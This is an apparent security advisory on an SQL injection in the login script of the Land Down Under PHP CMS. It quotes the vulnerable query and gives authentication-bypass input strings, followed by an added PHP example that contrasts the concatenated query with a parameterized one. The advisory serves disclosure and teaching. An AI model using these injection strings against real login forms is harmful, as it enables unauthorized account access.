"What is Land Down Under? Some call this a CMS (Content Management System), others a "Portal", or a "Website engine". It's a dumb machine, made of PHP files, that stores and queries data in a MySQL database, and sends those data to clients as HTML pages, with the help of skin files (a.k.a. "templates")".
One of the product's PHP scripts can be exploited to gain unauthorized access, because the script contains an SQL injection vulnerability.
Credit:
The information has been provided by gdayworld.
Land Down Under lacks basic security checks on user-provided data: the product makes no attempt to apply slashes to (escape) any of the incoming data. An attacker can therefore simply inject extra SQL statements into the original query.
Vulnerable code:
Here is where the actual vulnerable code exists (comments added by gdayworld):
// More code above
if ($a=="check")
{
    ldu_shield_protect();
    $rusername = cv('rusername','P','TXT');
    $rpassword = cv('rpassword','P','TXT');
    $rmdpass = md5($rpassword);
    $query="SELECT user_id, user_active, user_banned, user_banexpire, user_level, user_skin, user_lang FROM $db_users WHERE user_password='$rmdpass' AND user_name='$rusername'";
    $sql = ldu_mysql_query($query);
    // Continues to validate.
Exploit:
Using the form, simply enter "' OR 1=1 -- " (without the quotes) in the fields. For a specific user, simply type "' OR user_name='USERNAME' -- " (without the quotes).
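The query pattern shown above next to a parameterized version, as an added example (not code from Land Down Under or from gdayworld). It assumes PHP with the pdo_sqlite extension; the in-memory `users` table, its accounts and the function names `login_concat` and `login_prepared` are constructed for illustration.

```php
<?php
// Added example. Constructed in-memory SQLite table standing in for $db_users.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, user_password TEXT)');
$ins = $pdo->prepare('INSERT INTO users (user_name, user_password) VALUES (?, ?)');
$ins->execute(['admin', md5('constructed-admin-pass')]);  // constructed accounts
$ins->execute(['alice', md5('constructed-alice-pass')]);

// Same shape as the advisory's query: input is spliced into the SQL text.
// The password is hashed before use, so only the user name reaches the SQL verbatim.
function login_concat(PDO $pdo, string $name, string $pass): array
{
    $md = md5($pass);
    $sql = "SELECT user_id, user_name FROM users "
         . "WHERE user_password='$md' AND user_name='$name'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: placeholders send the values separately from the SQL text,
// so quotes and comment markers in the input are compared as plain data.
// (md5 is kept only to mirror the column format used on the page.)
function login_prepared(PDO $pdo, string $name, string $pass): array
{
    $st = $pdo->prepare(
        'SELECT user_id, user_name FROM users WHERE user_password = ? AND user_name = ?'
    );
    $st->execute([md5($pass), $name]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs: one legitimate login, one wrong password, and the two strings from the page.
$cases = [
    ['alice', 'constructed-alice-pass'],
    ['alice', 'wrong-password'],
    ["' OR 1=1 -- ", 'x'],
    ["' OR user_name='admin' -- ", 'x'],
];
foreach ($cases as [$name, $pass]) {
    printf(
        "%-28s concat: %d row(s)  prepared: %d row(s)\n",
        json_encode($name),
        count(login_concat($pdo, $name, $pass)),
        count(login_prepared($pdo, $name, $pass))
    );
}
```

The concatenated query returns rows for both strings from the page without a valid password, while the prepared query returns none for them and still accepts the legitimate login.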